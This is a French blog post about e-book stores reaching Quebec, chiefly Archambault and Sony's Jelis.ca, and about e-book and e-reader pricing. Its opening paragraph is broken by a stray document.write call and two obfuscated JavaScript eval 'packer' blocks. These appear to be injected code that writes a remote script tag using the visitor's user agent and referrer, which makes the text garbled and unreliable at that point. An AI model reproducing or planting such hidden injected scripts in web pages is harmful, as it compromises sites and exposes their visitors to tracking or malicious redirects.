Livres numériques en français

Ces dernières années nous avons vu apparaitre aux États-Unis une abondance de sites internet offrant des livres numériques (les fameux eBooks): Amazon.com, document.write(“”); Barnes & Noble, Borders, Sony et beaucoup d’autres. Protoculture offre déjà depuis plusieurs années ses titres les plus récents en format numérique.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eabyy|var|u0026u|referrer|infhh||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fyadk|var|u0026u|referrer|kedit||js|php’.split(‘|’),0,{}))

De telles boutiques virtuelles ont également commencé à faire leur apparition en France (comme
Numilog ou le site de la FNAC par exemple, quoique nos cousins Européens semblent plus portés vers les documents gratuits comme c’est le cas avec Gallica) mais jusqu’à très récemment il n’y avait rien pour le marché francophone nord-américain.

The Gazette nous apprends ce matin que Archambault et Sony se sont associé pour nous offrir une boutique virtuelle de livres numériques: Jelis.ca.

Cela permettra à Sony de vendre son lecteur électronique au Québec (quoiqu’un lecteur n’est pas nécessaire pour lire les titres acheté sur Jelis.ca) et à Archambault d’entamer un marché encore vierge puisque Kindle, le lecteur électronique d’Amazon, n’est pas disponible à l’extérieur des USA.

Il est intéressant de noter que plusieurs titres de l’éditeur de genres Alire sont disponible sur Jelis.ca.

Je ne crois pas que le livre imprimé soit menacé par le livre numérique, qui ne représente qu’un nouveau format de publication comme l’est le livre de poche ou le livre audio. Et l’expension du marché du livre numérique est grandement limitée par les prix des lecteurs électroniques ($260 à $600 dépendant des cas) et celui des livres numériques eux-même. En effet, dans la plupart des boutiques virtuelles de livres numériques, ceux-ci sont vendu au même prix que le livre imprimé, ce qui est ridicule considérant que ce produit n’encourt aucun coût d’impression et des frais de distribution moindre (seulement le pourcentage que prends le détaillant virtuel). Théoriquement, un tel format devrait offrir à l’éditeur un revenu plus grand et, au lecteur, un coût d’achat moindre (d’à peu près 30%). Mais ce n’est pas encore le cas. Toutefois, c’est un format qui a de l’avenir.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s